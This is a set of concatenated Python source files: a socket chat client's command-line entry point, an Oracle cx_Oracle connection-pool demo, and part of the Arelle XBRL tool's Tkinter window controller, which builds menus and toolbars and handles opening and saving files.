def __exit__(self, t, v, tb):
self.__socket.close()
self.__socket = None
def run(self):
with self as s:
s.settimeout(3)
try:
threading.Thread(target=self._track_other_messages, args=(s,), daemon=True).start()
while True:
message = input(f"({self.username})>_")
s.sendall(bytes(json.dumps({
"message": message,
"username": self.username,
"password": self.password
}), encoding="utf8"))
except KeyboardInterrupt:
pass
def _track_other_messages(self, conn):
while True:
try:
data = conn.recv(1024)
data = str(data, encoding="utf8")
data = json.loads(data)
name, message = data["name"], data["message"]
print(f"\r({name})>_{message}")
except KeyboardInterrupt:
break
except:
continue
def main():
parser = argparse.ArgumentParser(description="Client application.")
parser.add_argument("--username", "-u", type=str, help="Your username, visible to everyone.")
parser.add_argument("--password", "-p", type=str, help="Your password, visible as SHA256 hash to everyone.", default=None)
parser.add_argument("--ip", type=str, help="Server's IP address.", default="127.0.0.1")
parser.add_argument("--port", type=int, help="Server's port.", default=12288)
args = parser.parse_args()
client = Client(args.ip, args.port, args.username, args.password)
client.run()
if __name__ == "__main__":
main()
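# Example usage (assuming the matching chat server from this project is listening;
# --ip and --port default to 127.0.0.1:12288):
#
#   python client.py -u alice -p secret
#   python client.py --username bob --password hunter2 --ip 192.168.1.10 --port 12288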
|
connect_pool.py
|
#------------------------------------------------------------------------------
# connect_pool.py (Section 2.1)
#------------------------------------------------------------------------------
#------------------------------------------------------------------------------
# Copyright 2017, 2018, Oracle and/or its affiliates. All rights reserved.
#------------------------------------------------------------------------------
from __future__ import print_function
import cx_Oracle
import threading
import db_config
pool = cx_Oracle.SessionPool(db_config.user, db_config.pw, db_config.dsn,
min = 2, max = 5, increment = 1, threaded = True)
def Query():
con = pool.acquire()
cur = con.cursor()
for i in range(4):
cur.execute("select myseq.nextval from dual")
seqval, = cur.fetchone()
print("Thread", threading.current_thread().name, "fetched sequence =", seqval)
thread1 = threading.Thread(name='#1', target=Query)
thread1.start()
thread2 = threading.Thread(name='#2', target=Query)
thread2.start()
thread1.join()
thread2.join()
print("All done!")
|
CntlrWinMain.py
|
'''
Created on Oct 3, 2010
This module is Arelle's controller in windowing interactive UI mode
@author: Mark V Systems Limited
(c) Copyright 2010 Mark V Systems Limited, All rights reserved.
'''
from arelle import PythonUtil # define 2.x or 3.x string types
import os, sys, subprocess, pickle, time, locale, re
from tkinter import (Tk, TclError, Toplevel, Menu, PhotoImage, StringVar, BooleanVar, N, S, E, W, EW,
HORIZONTAL, VERTICAL, END, font as tkFont)
try:
from tkinter.ttk import Frame, Button, Label, Combobox, Separator, PanedWindow, Notebook
except ImportError: # 3.0 versions of tkinter
from ttk import Frame, Button, Label, Combobox, Separator, PanedWindow, Notebook
import tkinter.tix
import tkinter.filedialog
import tkinter.messagebox, traceback
from arelle.Locale import format_string
from arelle.CntlrWinTooltip import ToolTip
from arelle import XbrlConst
from arelle.PluginManager import pluginClassMethods
from arelle.UrlUtil import isHttpUrl
import logging
import threading, queue
from arelle import Cntlr
from arelle import (DialogURL, DialogLanguage,
DialogPluginManager, DialogPackageManager,
ModelDocument,
ModelManager,
PackageManager,
RenderingEvaluator,
TableStructure,
ViewWinDTS,
ViewWinProperties, ViewWinConcepts, ViewWinRelationshipSet, ViewWinFormulae,
ViewWinFactList, ViewWinFactTable, ViewWinRenderedGrid, ViewWinXml,
ViewWinRoleTypes, ViewFileRoleTypes, ViewFileConcepts,
ViewWinTests, ViewWinTree, ViewWinVersReport, ViewWinRssFeed,
ViewFileTests,
ViewFileRenderedGrid,
ViewFileRelationshipSet,
Updater
)
from arelle.ModelFormulaObject import FormulaOptions
from arelle.FileSource import openFileSource
restartMain = True
class CntlrWinMain (Cntlr.Cntlr):
def __init__(self, parent):
super(CntlrWinMain, self).__init__(hasGui=True)
self.parent = parent
self.filename = None
self.dirty = False
overrideLang = self.config.get("labelLangOverride")
self.labelLang = overrideLang if overrideLang else self.modelManager.defaultLang
self.data = {}
if self.isMac: # Mac Python fonts render bigger than in other apps (Terminal, TextEdit, Word) and than in Windows Arelle
_defaultFont = tkFont.nametofont("TkDefaultFont") # label, status bar, treegrid
_defaultFont.configure(size=11)
_textFont = tkFont.nametofont("TkTextFont") # entry widget and combobox entry field
_textFont.configure(size=11)
#parent.option_add("*Font", _defaultFont) # would be needed if not using defaulted font
toolbarButtonPadding = 1
else:
toolbarButtonPadding = 4
tkinter.CallWrapper = TkinterCallWrapper
imgpath = self.imagesDir + os.sep
if self.isMSW:
icon = imgpath + "arelle.ico"
parent.iconbitmap(icon, default=icon)
#image = PhotoImage(file=path + "arelle32.gif")
#label = Label(None, image=image)
#parent.iconwindow(label)
else:
parent.iconbitmap("@" + imgpath + "arelle.xbm")
# try with gif file
#parent.iconbitmap(path + "arelle.gif")
self.menubar = Menu(self.parent)
self.parent["menu"] = self.menubar
self.fileMenu = Menu(self.menubar, tearoff=0)
self.fileMenuLength = 1
for label, command, shortcut_text, shortcut in (
#(_("New..."), self.fileNew, "Ctrl+N", "<Control-n>"),
(_("Open File..."), self.fileOpen, "Ctrl+O", "<Control-o>"),
(_("Open Web..."), self.webOpen, "Shift+Alt+O", "<Shift-Alt-o>"),
(_("Import File..."), self.importFileOpen, None, None),
(_("Import Web..."), self.importWebOpen, None, None),
("PLUG-IN", "CntlrWinMain.Menu.File.Open", None, None),
(_("Save"), self.fileSaveExistingFile, "Ctrl+S", "<Control-s>"),
(_("Save As..."), self.fileSave, None, None),
(_("Save DTS Package"), self.saveDTSpackage, None, None),
("PLUG-IN", "CntlrWinMain.Menu.File.Save", None, None),
(_("Close"), self.fileClose, "Ctrl+W", "<Control-w>"),
(None, None, None, None),
(_("Quit"), self.quit, "Ctrl+Q", "<Control-q>"),
#(_("Restart"), self.restart, None, None),
(None, None, None, None),
("",None,None,None) # position for file history
):
if label is None:
self.fileMenu.add_separator()
elif label == "PLUG-IN":
for pluginMenuExtender in pluginClassMethods(command):
pluginMenuExtender(self, self.fileMenu)
self.fileMenuLength += 1
else:
self.fileMenu.add_command(label=label, underline=0, command=command, accelerator=shortcut_text)
self.parent.bind(shortcut, command)
self.fileMenuLength += 1
self.loadFileMenuHistory()
self.menubar.add_cascade(label=_("File"), menu=self.fileMenu, underline=0)
toolsMenu = Menu(self.menubar, tearoff=0)
validateMenu = Menu(self.menubar, tearoff=0)
toolsMenu.add_cascade(label=_("Validation"), menu=validateMenu, underline=0)
validateMenu.add_command(label=_("Validate"), underline=0, command=self.validate)
self.modelManager.validateDisclosureSystem = self.config.setdefault("validateDisclosureSystem",False)
self.validateDisclosureSystem = BooleanVar(value=self.modelManager.validateDisclosureSystem)
self.validateDisclosureSystem.trace("w", self.setValidateDisclosureSystem)
validateMenu.add_checkbutton(label=_("Disclosure system checks"), underline=0, variable=self.validateDisclosureSystem, onvalue=True, offvalue=False)
validateMenu.add_command(label=_("Select disclosure system..."), underline=0, command=self.selectDisclosureSystem)
self.modelManager.validateCalcLB = self.config.setdefault("validateCalcLB",False)
self.validateCalcLB = BooleanVar(value=self.modelManager.validateCalcLB)
self.validateCalcLB.trace("w", self.setValidateCalcLB)
validateMenu.add_checkbutton(label=_("Calc Linkbase checks"), underline=0, variable=self.validateCalcLB, onvalue=True, offvalue=False)
self.modelManager.validateInferDecimals = self.config.setdefault("validateInferDecimals",False)
self.validateInferDecimals = BooleanVar(value=self.modelManager.validateInferDecimals)
self.validateInferDecimals.trace("w", self.setValidateInferDecimals)
validateMenu.add_checkbutton(label=_("Infer Decimals in calculations"), underline=0, variable=self.validateInferDecimals, onvalue=True, offvalue=False)
self.modelManager.validateUtr = self.config.setdefault("validateUtr",True)
self.validateUtr = BooleanVar(value=self.modelManager.validateUtr)
self.validateUtr.trace("w", self.setValidateUtr)
validateMenu.add_checkbutton(label=_("Unit Type Registry validation"), underline=0, variable=self.validateUtr, onvalue=True, offvalue=False)
for pluginMenuExtender in pluginClassMethods("CntlrWinMain.Menu.Validation"):
pluginMenuExtender(self, validateMenu)
formulaMenu = Menu(self.menubar, tearoff=0)
formulaMenu.add_command(label=_("Parameters..."), underline=0, command=self.formulaParametersDialog)
toolsMenu.add_cascade(label=_("Formula"), menu=formulaMenu, underline=0)
self.modelManager.formulaOptions = FormulaOptions(self.config.get("formulaParameters"))
toolsMenu.add_command(label=_("Compare DTSes..."), underline=0, command=self.compareDTSes)
cacheMenu = Menu(self.menubar, tearoff=0)
rssWatchMenu = Menu(self.menubar, tearoff=0)
rssWatchMenu.add_command(label=_("Options..."), underline=0, command=self.rssWatchOptionsDialog)
rssWatchMenu.add_command(label=_("Start"), underline=0, command=lambda: self.rssWatchControl(start=True))
rssWatchMenu.add_command(label=_("Stop"), underline=0, command=lambda: self.rssWatchControl(stop=True))
toolsMenu.add_cascade(label=_("RSS Watch"), menu=rssWatchMenu, underline=0)
self.modelManager.rssWatchOptions = self.config.setdefault("rssWatchOptions", {})
toolsMenu.add_cascade(label=_("Internet"), menu=cacheMenu, underline=0)
self.webCache.workOffline = self.config.setdefault("workOffline",False)
self.workOffline = BooleanVar(value=self.webCache.workOffline)
self.workOffline.trace("w", self.setWorkOffline)
cacheMenu.add_checkbutton(label=_("Work offline"), underline=0, variable=self.workOffline, onvalue=True, offvalue=False)
'''
self.webCache.recheck = self.config.setdefault("webRecheck",False)
self.webRecheck = BooleanVar(value=self.webCache.webRecheck)
self.webRecheck.trace("w", self.setWebRecheck)
cacheMenu.add_checkbutton(label=_("Recheck file dates weekly"), underline=0, variable=self.workOffline, onvalue=True, offvalue=False)
self.webCache.notify = self.config.setdefault("",False)
self.downloadNotify = BooleanVar(value=self.webCache.retrievalNotify)
self.downloadNotify.trace("w", self.setRetrievalNotify)
cacheMenu.add_checkbutton(label=_("Notify file downloads"), underline=0, variable=self.workOffline, onvalue=True, offvalue=False)
'''
cacheMenu.add_command(label=_("Clear cache"), underline=0, command=self.confirmClearWebCache)
cacheMenu.add_command(label=_("Manage cache"), underline=0, command=self.manageWebCache)
cacheMenu.add_command(label=_("Proxy Server"), underline=0, command=self.setupProxy)
logmsgMenu = Menu(self.menubar, tearoff=0)
toolsMenu.add_cascade(label=_("Messages log"), menu=logmsgMenu, underline=0)
logmsgMenu.add_command(label=_("Clear"), underline=0, command=self.logClear)
logmsgMenu.add_command(label=_("Save to file"), underline=0, command=self.logSaveToFile)
self.modelManager.collectProfileStats = self.config.setdefault("collectProfileStats",False)
self.collectProfileStats = BooleanVar(value=self.modelManager.collectProfileStats)
self.collectProfileStats.trace("w", self.setCollectProfileStats)
logmsgMenu.add_checkbutton(label=_("Collect profile stats"), underline=0, variable=self.collectProfileStats, onvalue=True, offvalue=False)
logmsgMenu.add_command(label=_("Log profile stats"), underline=0, command=self.showProfileStats)
logmsgMenu.add_command(label=_("Clear profile stats"), underline=0, command=self.clearProfileStats)
self.showDebugMessages = BooleanVar(value=self.config.setdefault("showDebugMessages",False))
self.showDebugMessages.trace("w", self.setShowDebugMessages)
logmsgMenu.add_checkbutton(label=_("Show debug messages"), underline=0, variable=self.showDebugMessages, onvalue=True, offvalue=False)
toolsMenu.add_command(label=_("Language..."), underline=0, command=lambda: DialogLanguage.askLanguage(self))
for pluginMenuExtender in pluginClassMethods("CntlrWinMain.Menu.Tools"):
pluginMenuExtender(self, toolsMenu)
self.menubar.add_cascade(label=_("Tools"), menu=toolsMenu, underline=0)
# view menu only if any plug-in additions provided
if any (pluginClassMethods("CntlrWinMain.Menu.View")):
viewMenu = Menu(self.menubar, tearoff=0)
for pluginMenuExtender in pluginClassMethods("CntlrWinMain.Menu.View"):
pluginMenuExtender(self, viewMenu)
self.menubar.add_cascade(label=_("View"), menu=viewMenu, underline=0)
helpMenu = Menu(self.menubar, tearoff=0)
for label, command, shortcut_text, shortcut in (
(_("Check for updates"), lambda: Updater.checkForUpdates(self), None, None),
(_("Manage plug-ins"), lambda: DialogPluginManager.dialogPluginManager(self), None, None),
(_("Manage packages"), lambda: DialogPackageManager.dialogPackageManager(self), None, None),
("PLUG-IN", "CntlrWinMain.Menu.Help.Upper", None, None),
(None, None, None, None),
(_("About..."), self.helpAbout, None, None),
("PLUG-IN", "CntlrWinMain.Menu.Help.Lower", None, None),
):
if label is None:
helpMenu.add_separator()
elif label == "PLUG-IN":
for pluginMenuExtender in pluginClassMethods(command):
pluginMenuExtender(self, helpMenu)
else:
helpMenu.add_command(label=label, underline=0, command=command, accelerator=shortcut_text)
self.parent.bind(shortcut, command)
for pluginMenuExtender in pluginClassMethods("CntlrWinMain.Menu.Help"):
pluginMenuExtender(self, toolsMenu)
self.menubar.add_cascade(label=_("Help"), menu=helpMenu, underline=0)
windowFrame = Frame(self.parent)
self.statusbar = Label(windowFrame, text=_("Ready..."), anchor=W)
self.statusbarTimerId = self.statusbar.after(5000, self.uiClearStatusTimerEvent)
self.statusbar.grid(row=2, column=0, columnspan=2, sticky=EW)
#self.balloon = tkinter.tix.Balloon(windowFrame, statusbar=self.statusbar)
self.toolbar_images = []
toolbar = Frame(windowFrame)
menubarColumn = 0
self.validateTooltipText = StringVar()
for image, command, toolTip, statusMsg in (
#("images/toolbarNewFile.gif", self.fileNew),
("toolbarOpenFile.gif", self.fileOpen, _("Open local file"), _("Open by choosing a local XBRL file, testcase, or archive file")),
("toolbarOpenWeb.gif", self.webOpen, _("Open web file"), _("Enter an http:// URL of an XBRL file or testcase")),
("toolbarSaveFile.gif", self.fileSaveExistingFile, _("Save file"), _("Saves currently selected local XBRL file")),
("toolbarClose.gif", self.fileClose, _("Close"), _("Closes currently selected instance/DTS or testcase(s)")),
(None,None,None,None),
("toolbarFindMenu.gif", self.find, _("Find"), _("Find dialog for scope and method of searching")),
(None,None,None,None),
("toolbarValidate.gif", self.validate, self.validateTooltipText, _("Validate currently selected DTS or testcase(s)")),
("toolbarCompare.gif", self.compareDTSes, _("Compare DTSes"), _("compare two DTSes")),
(None,None,None,None),
("toolbarLogClear.gif", self.logClear, _("Messages Log | Clear"), _("Clears the messages log")),
#(Combobox(toolbar, textvariable=self.findVar, values=self.findValues,
# ), self.logClear, _("Find options"), _("Select of find options")),
):
if command is None:
tbControl = Separator(toolbar, orient=VERTICAL)
tbControl.grid(row=0, column=menubarColumn, padx=6)
elif isinstance(image, Combobox):
tbControl = image
tbControl.grid(row=0, column=menubarColumn)
else:
image = os.path.join(self.imagesDir, image)
try:
image = PhotoImage(file=image)
self.toolbar_images.append(image)
tbControl = Button(toolbar, image=image, command=command, style="Toolbutton", padding=toolbarButtonPadding)
tbControl.grid(row=0, column=menubarColumn)
except TclError as err:
print(err)
if isinstance(toolTip,StringVar):
ToolTip(tbControl, textvariable=toolTip, wraplength=240)
else:
ToolTip(tbControl, text=toolTip)
menubarColumn += 1
for toolbarExtender in pluginClassMethods("CntlrWinMain.Toolbar"):
toolbarExtender(self, toolbar)
toolbar.grid(row=0, column=0, sticky=(N, W))
paneWinTopBtm = PanedWindow(windowFrame, orient=VERTICAL)
paneWinTopBtm.grid(row=1, column=0, sticky=(N, S, E, W))
paneWinLeftRt = tkinter.PanedWindow(paneWinTopBtm, orient=HORIZONTAL)
paneWinLeftRt.grid(row=0, column=0, sticky=(N, S, E, W))
paneWinLeftRt.bind("<<NotebookTabChanged>>", self.onTabChanged)
paneWinTopBtm.add(paneWinLeftRt)
self.tabWinTopLeft = Notebook(paneWinLeftRt, width=250, height=300)
self.tabWinTopLeft.grid(row=0, column=0, sticky=(N, S, E, W))
paneWinLeftRt.add(self.tabWinTopLeft)
self.tabWinTopRt = Notebook(paneWinLeftRt)
self.tabWinTopRt.grid(row=0, column=0, sticky=(N, S, E, W))
self.tabWinTopRt.bind("<<NotebookTabChanged>>", self.onTabChanged)
paneWinLeftRt.add(self.tabWinTopRt)
self.tabWinBtm = Notebook(paneWinTopBtm)
self.tabWinBtm.grid(row=0, column=0, sticky=(N, S, E, W))
self.tabWinBtm.bind("<<NotebookTabChanged>>", self.onTabChanged)
paneWinTopBtm.add(self.tabWinBtm)
from arelle import ViewWinList
self.logView = ViewWinList.ViewList(None, self.tabWinBtm, _("messages"), True)
self.startLogging(logHandler=WinMainLogHandler(self)) # start logger
logViewMenu = self.logView.contextMenu(contextMenuClick=self.contextMenuClick)
logViewMenu.add_command(label=_("Clear"), underline=0, command=self.logClear)
logViewMenu.add_command(label=_("Save to file"), underline=0, command=self.logSaveToFile)
if self.hasClipboard:
logViewMenu.add_command(label=_("Copy to clipboard"), underline=0, command=lambda: self.logView.copyToClipboard(cntlr=self))
windowFrame.grid(row=0, column=0, sticky=(N,S,E,W))
windowFrame.columnconfigure(0, weight=999)
windowFrame.columnconfigure(1, weight=1)
windowFrame.rowconfigure(0, weight=1)
windowFrame.rowconfigure(1, weight=999)
windowFrame.rowconfigure(2, weight=1)
paneWinTopBtm.columnconfigure(0, weight=1)
paneWinTopBtm.rowconfigure(0, weight=1)
paneWinLeftRt.columnconfigure(0, weight=1)
paneWinLeftRt.rowconfigure(0, weight=1)
self.tabWinTopLeft.columnconfigure(0, weight=1)
self.tabWinTopLeft.rowconfigure(0, weight=1)
self.tabWinTopRt.columnconfigure(0, weight=1)
self.tabWinTopRt.rowconfigure(0, weight=1)
self.tabWinBtm.columnconfigure(0, weight=1)
self.tabWinBtm.rowconfigure(0, weight=1)
window = self.parent.winfo_toplevel()
window.columnconfigure(0, weight=1)
window.rowconfigure(0, weight=1)
priorState = self.config.get('windowState')
screenW = self.parent.winfo_screenwidth() - 16 # allow for window edge
screenH = self.parent.winfo_screenheight() - 64 # allow for caption and menus
if priorState == "zoomed":
self.parent.state("zoomed")
w = screenW
h = screenH
else:
priorGeometry = re.match(r"(\d+)x(\d+)[+]?([-]?\d+)[+]?([-]?\d+)",self.config.get('windowGeometry'))
if priorGeometry and priorGeometry.lastindex >= 4:
try:
w = int(priorGeometry.group(1))
h = int(priorGeometry.group(2))
x = int(priorGeometry.group(3))
y = int(priorGeometry.group(4))
if x + w > screenW:
if w < screenW:
x = screenW - w
else:
x = 0
w = screenW
elif x < 0:
x = 0
if w > screenW:
w = screenW
if y + h > screenH:
if y < screenH:
y = screenH - h
else:
y = 0
h = screenH
elif y < 0:
y = 0
if h > screenH:
h = screenH
self.parent.geometry("{0}x{1}+{2}+{3}".format(w,h,x,y))
except:
pass
# set top/btm divider
topLeftW, topLeftH = self.config.get('tabWinTopLeftSize',(250,300))
if 10 < topLeftW < w - 60:
self.tabWinTopLeft.config(width=topLeftW)
if 10 < topLeftH < h - 60:
self.tabWinTopLeft.config(height=topLeftH)
self.parent.title(_("arelle - Unnamed"))
self.logFile = None
self.uiThreadQueue = queue.Queue() # background processes communicate with ui thread
self.uiThreadChecker(self.statusbar) # start background queue
self.modelManager.loadCustomTransforms() # load if custom transforms not loaded
if not self.modelManager.disclosureSystem.select(self.config.setdefault("disclosureSystem", None)):
self.validateDisclosureSystem.set(False)
self.modelManager.validateDisclosureSystem = False
self.setValidateTooltipText()
def onTabChanged(self, event, *args):
try:
widgetIndex = event.widget.index("current")
tabId = event.widget.tabs()[widgetIndex]
for widget in event.widget.winfo_children():
if str(widget) == tabId:
self.currentView = widget.view
break
except (AttributeError, TypeError, TclError):
pass
def loadFileMenuHistory(self):
self.fileMenu.delete(self.fileMenuLength, self.fileMenuLength + 2)
fileHistory = self.config.setdefault("fileHistory", [])
self.recentFilesMenu = Menu(self.menubar, tearoff=0)
for i in range( min( len(fileHistory), 10 ) ):
self.recentFilesMenu.add_command(
label=fileHistory[i],
command=lambda j=i: self.fileOpenFile(self.config["fileHistory"][j]))
self.fileMenu.add_cascade(label=_("Recent files"), menu=self.recentFilesMenu, underline=0)
importHistory = self.config.setdefault("importHistory", [])
self.recentAttachMenu = Menu(self.menubar, tearoff=0)
for i in range( min( len(importHistory), 10 ) ):
self.recentAttachMenu.add_command(
label=importHistory[i],
command=lambda j=i: self.fileOpenFile(self.config["importHistory"][j],importToDTS=True))
self.fileMenu.add_cascade(label=_("Recent imports"), menu=self.recentAttachMenu, underline=0)
self.packagesMenu = Menu(self.menubar, tearoff=0)
hasPackages = False
for i, packageInfo in enumerate(sorted(PackageManager.packagesConfig.get("packages", []),
key=lambda packageInfo: packageInfo.get("name")),
start=1):
name = packageInfo.get("name", "package{}".format(i))
URL = packageInfo.get("URL")
if name and URL and packageInfo.get("status") == "enabled":
self.packagesMenu.add_command(
label=name,
command=lambda url=URL: self.fileOpenFile(url))
hasPackages = True
if hasPackages:
self.fileMenu.add_cascade(label=_("Packages"), menu=self.packagesMenu, underline=0)
def onPackageEnablementChanged(self):
self.loadFileMenuHistory()
def fileNew(self, *ignore):
if not self.okayToContinue():
return
self.logClear()
self.dirty = False
self.filename = None
self.data = {}
self.parent.title(_("arelle - Unnamed"));
self.modelManager.load(None);
def getViewAndModelXbrl(self):
view = getattr(self, "currentView", None)
if view:
modelXbrl = None
try:
modelXbrl = view.modelXbrl
return (view, modelXbrl)
except AttributeError:
return (view, None)
return (None, None)
def okayToContinue(self):
view, modelXbrl = self.getViewAndModelXbrl()
documentIsModified = False
if view is not None:
try:
# What follows only exists in ViewWinRenderedGrid
view.updateInstanceFromFactPrototypes()
except AttributeError:
pass
if modelXbrl is not None:
documentIsModified = modelXbrl.isModified()
if not self.dirty and (not documentIsModified):
return True
reply = tkinter.messagebox.askokcancel(
_("arelle - Unsaved Changes"),
_("Are you sure to close the current instance without saving?\n (OK will discard changes.)"),
parent=self.parent)
if reply is None:
return False
else:
return reply
def fileSave(self, event=None, view=None, fileType=None, filenameFromInstance=False, *ignore):
if view is None:
view = getattr(self, "currentView", None)
if view is not None:
filename = None
modelXbrl = None
try:
modelXbrl = view.modelXbrl
except AttributeError:
pass
if filenameFromInstance:
try:
modelXbrl = view.modelXbrl
filename = modelXbrl.modelDocument.filepath
if filename.endswith('.xsd'): # DTS entry point, no instance saved yet!
filename = None
except AttributeError:
pass
if isinstance(view, ViewWinRenderedGrid.ViewRenderedGrid):
initialdir = os.path.dirname(modelXbrl.modelDocument.uri)
if fileType in ("html", "xml", None):
if fileType == "html" and filename is None:
filename = self.uiFileDialog("save",
title=_("arelle - Save HTML-rendered Table"),
initialdir=initialdir,
filetypes=[(_("HTML file .html"), "*.html"), (_("HTML file .htm"), "*.htm")],
defaultextension=".html")
elif fileType == "xml" and filename is None:
filename = self.uiFileDialog("save",
title=_("arelle - Save Table Layout Model"),
initialdir=initialdir,
filetypes=[(_("Layout model file .xml"), "*.xml")],
defaultextension=".xml")
else: # ask file type
if filename is None:
filename = self.uiFileDialog("save",
title=_("arelle - Save XBRL Instance or HTML-rendered Table"),
initialdir=initialdir,
filetypes=[(_("XBRL instance .xbrl"), "*.xbrl"), (_("XBRL instance .xml"), "*.xml"), (_("HTML table .html"), "*.html"), (_("HTML table .htm"), "*.htm")],
defaultextension=".html")
if filename and (filename.endswith(".xbrl") or filename.endswith(".xml")):
view.saveInstance(filename)
return True
if not filename:
return False
try:
ViewFileRenderedGrid.viewRenderedGrid(modelXbrl, filename, lang=self.labelLang, sourceView=view)
except (IOError, EnvironmentError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to save {0}:\n{1}").format(
filename, err),
parent=self.parent)
return True
elif fileType == "xbrl":
return self.uiFileDialog("save",
title=_("arelle - Save Instance"),
initialdir=initialdir,
filetypes=[(_("XBRL instance .xbrl"), "*.xbrl"), (_("XBRL instance .xml"), "*.xml")],
defaultextension=".xbrl")
elif isinstance(view, ViewWinTests.ViewTests) and modelXbrl.modelDocument.type in (ModelDocument.Type.TESTCASESINDEX, ModelDocument.Type.TESTCASE):
filename = self.uiFileDialog("save",
title=_("arelle - Save Test Results"),
initialdir=os.path.dirname(self.modelManager.modelXbrl.modelDocument.uri),
filetypes=[(_("CSV file"), "*.csv")],
defaultextension=".csv")
if not filename:
return False
try:
ViewFileTests.viewTests(self.modelManager.modelXbrl, filename)
except (IOError, EnvironmentError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to save {0}:\n{1}").format(
filename, err),
parent=self.parent)
return True
elif isinstance(view, ViewWinTree.ViewTree):
filename = self.uiFileDialog("save",
title=_("arelle - Save {0}").format(view.tabTitle),
initialdir=os.path.dirname(self.modelManager.modelXbrl.modelDocument.uri),
filetypes=[(_("CSV file"), "*.csv"),(_("HTML file"), "*.html"),(_("XML file"), "*.xml"),(_("JSON file"), "*.json")],
defaultextension=".csv")
if not filename:
return False
try:
if isinstance(view, ViewWinRoleTypes.ViewRoleTypes):
ViewFileRoleTypes.viewRoleTypes(modelXbrl, filename, view.tabTitle, view.isArcrole, lang=view.lang)
elif isinstance(view, ViewWinConcepts.ViewConcepts):
ViewFileConcepts.viewConcepts(modelXbrl, filename, labelrole=view.labelrole, lang=view.lang)
else:
ViewFileRelationshipSet.viewRelationshipSet(modelXbrl, filename, view.tabTitle, view.arcrole, labelrole=view.labelrole, lang=view.lang)
except (IOError, EnvironmentError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to save {0}:\n{1}").format(
filename, err),
parent=self.parent)
return True
elif isinstance(view, ViewWinXml.ViewXml) and self.modelManager.modelXbrl.formulaOutputInstance:
filename = self.uiFileDialog("save",
title=_("arelle - Save Formula Result Instance Document"),
initialdir=os.path.dirname(self.modelManager.modelXbrl.modelDocument.uri),
filetypes=[(_("XBRL output instance .xml"), "*.xml"), (_("XBRL output instance .xbrl"), "*.xbrl")],
defaultextension=".xml")
if not filename:
return False
try:
from arelle import XmlUtil
with open(filename, "w") as fh:
XmlUtil.writexml(fh, self.modelManager.modelXbrl.formulaOutputInstance.modelDocument.xmlDocument, encoding="utf-8")
self.addToLog(_("[info] Saved formula output instance to {0}").format(filename) )
except (IOError, EnvironmentError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to save {0}:\n{1}").format(
self.filename, err),
parent=self.parent)
return True
tkinter.messagebox.showwarning(_("arelle - Save what?"),
_("Nothing has been selected that can be saved. \nPlease select a view pane that can be saved."),
parent=self.parent)
'''
if self.filename is None:
filename = self.uiFileDialog("save",
title=_("arelle - Save File"),
initialdir=".",
filetypes=[(_("Xbrl file"), "*.x*")],
defaultextension=".xbrl")
if not filename:
return False
self.filename = filename
if not self.filename.endswith(".xbrl"):
self.filename += ".xbrl"
try:
with open(self.filename, "wb") as fh:
pickle.dump(self.data, fh, pickle.HIGHEST_PROTOCOL)
self.dirty = False
self.uiShowStatus(_("Saved {0} items to {1}").format(
len(self.data),
self.filename), clearAfter=5000)
self.parent.title(_("arelle - {0}").format(
os.path.basename(self.filename)))
except (EnvironmentError, pickle.PickleError) as err:
tkinter.messagebox.showwarning(_("arelle - Error"),
_("Failed to save {0}:\n{1}").format(
self.filename, err),
parent=self.parent)
return True;
'''
def fileSaveExistingFile(self, event=None, view=None, fileType=None, *ignore):
return self.fileSave(view=view, fileType=fileType, filenameFromInstance=True)
def saveDTSpackage(self):
self.modelManager.saveDTSpackage(allDTSes=True)
def fileOpen(self, *ignore):
if not self.okayToContinue():
return
filename = self.uiFileDialog("open",
title=_("arelle - Open file"),
initialdir=self.config.setdefault("fileOpenDir","."),
filetypes=[(_("XBRL files"), "*.*")],
defaultextension=".xbrl")
if self.isMSW and "/Microsoft/Windows/Temporary Internet Files/Content.IE5/" in filename:
tkinter.messagebox.showerror(_("Loading web-accessed files"),
_('Please open web-accessed files with the second toolbar button, "Open web file", or the File menu, second entry, "Open web..."'), parent=self.parent)
return
if os.sep == "\\":
filename = filename.replace("/", "\\")
self.fileOpenFile(filename)
def importFileOpen(self, *ignore):
if not self.modelManager.modelXbrl or self.modelManager.modelXbrl.modelDocument.type not in (
ModelDocument.Type.SCHEMA, ModelDocument.Type.LINKBASE, ModelDocument.Type.INSTANCE, ModelDocument.Type.INLINEXBRL):
tkinter.messagebox.showwarning(_("arelle - Warning"),
_("Import requires an opened DTS"), parent=self.parent)
return False
filename = self.uiFileDialog("open",
title=_("arelle - Import file into opened DTS"),
initialdir=self.config.setdefault("importOpenDir","."),
filetypes=[(_("XBRL files"), "*.*")],
defaultextension=".xml")
if self.isMSW and "/Microsoft/Windows/Temporary Internet Files/Content.IE5/" in filename:
tkinter.messagebox.showerror(_("Loading web-accessed files"),
_('Please import web-accessed files with the File menu, fourth entry, "Import web..."'), parent=self.parent)
return
if os.sep == "\\":
filename = filename.replace("/", "\\")
self.fileOpenFile(filename, importToDTS=True)
def updateFileHistory(self, url, importToDTS):
key = "importHistory" if importToDTS else "fileHistory"
fileHistory = self.config.setdefault(key, [])
while fileHistory.count(url) > 0:
fileHistory.remove(url)
if len(fileHistory) > 10:
fileHistory[10:] = []
fileHistory.insert(0, url)
self.config[key] = fileHistory
self.loadFileMenuHistory()
self.saveConfig()
def fileOpenFile(self, filename, importToDTS=False, selectTopView=False):
if filename:
filesource = None
# check for archive files
filesource = openFileSource(filename, self,
checkIfXmlIsEis=self.modelManager.disclosureSystem and
self.modelManager.disclosureSystem.validationType == "EFM")
if filesource.isArchive and not filesource.selection: # or filesource.isRss:
from arelle import DialogOpenArchive
filename = DialogOpenArchive.askArchiveFile(self, filesource)
if filename:
if importToDTS:
if not isHttpUrl(filename):
self.config["importOpenDir"] = os.path.dirname(filename)
else:
if not isHttpUrl(filename):
self.config["fileOpenDir"] = os.path.dirname(filesource.baseurl if filesource.isArchive else filename)
self.updateFileHistory(filename, importToDTS)
thread = threading.Thread(target=lambda: self.backgroundLoadXbrl(filesource,importToDTS,selectTopView))
thread.daemon = True
thread.start()
def webOpen(self, *ignore):
if not self.okayToContinue():
return
url = DialogURL.askURL(self.parent, buttonSEC=True, buttonRSS=True)
if url:
self.updateFileHistory(url, False)
filesource = openFileSource(url,self)
if filesource.isArchive and not filesource.selection: # or filesource.isRss:
from arelle import DialogOpenArchive
url = DialogOpenArchive.askArchiveFile(self, filesource)
self.updateFileHistory(url, False)
